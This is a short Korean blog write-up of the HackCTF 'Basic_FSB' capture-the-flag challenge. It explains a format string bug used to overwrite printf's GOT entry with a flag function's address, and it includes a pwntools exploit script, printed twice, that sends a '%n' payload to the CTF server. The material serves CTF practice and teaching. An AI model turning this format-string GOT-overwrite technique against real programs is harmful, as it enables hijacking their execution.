[HackCTF] Basic

문제 이름에 FSB (Format String Bug)가 써져있다

Format String Bug가 맞는지 확인하기 위하여

input값에 확인해보았다.

fsb 이용 print got 를 flag주소로 덮어서 쉘획득

 from pwn import *
 
p = remote("ctf.j0n9hyun.xyz", 3002)
e = ELF("./basic_fsb")
pay = p32(e.got['printf'])
pay += b"%134514096x%n"
p.sendline(pay)
p.interactive()
p.close()

'Write-Up > HackCTF' 카테고리의 다른 글

[HackCTF] x64 Simple_size_BOF (0)	2021.05.16
[HackCTF] x64 Buffer Overflow (0)	2021.05.16
[HackCTF] 내 버퍼가 흘러넘친다!!! (0)	2021.05.15
[HackCTF] Basic_BOF #2 (0)	2021.05.15
[HackCTF] Basic_BOF #1 (0)	2021.05.15

내 블로그 - 관리자 홈 전환	`Q` `Q`
새 글 쓰기	`W` `W`

글 수정 (권한 있는 경우)	`E` `E`
댓글 영역으로 이동	`C` `C`

이 페이지의 URL 복사	`S` `S`
맨 위로 이동	`T` `T`
티스토리 홈 이동	`H` `H`
단축키 안내	`Shift` + `/` `⇧` + `/`

20's

[HackCTF] Basic_FSB

'Write-Up > HackCTF' 카테고리의 다른 글

티스토리툴바

단축키

내 블로그

블로그 게시글

모든 영역

	from pwn import *

	p = remote("ctf.j0n9hyun.xyz", 3002)
	e = ELF("./basic_fsb")
	pay = p32(e.got['printf'])
	pay += b"%134514096x%n"
	p.sendline(pay)
	p.interactive()
	p.close()

[HackCTF] Basic_FSB

'Write-Up > HackCTF' 카테고리의 다른 글

'Write-Up/HackCTF' Related Articles

티스토리툴바

단축키

내 블로그

블로그 게시글

모든 영역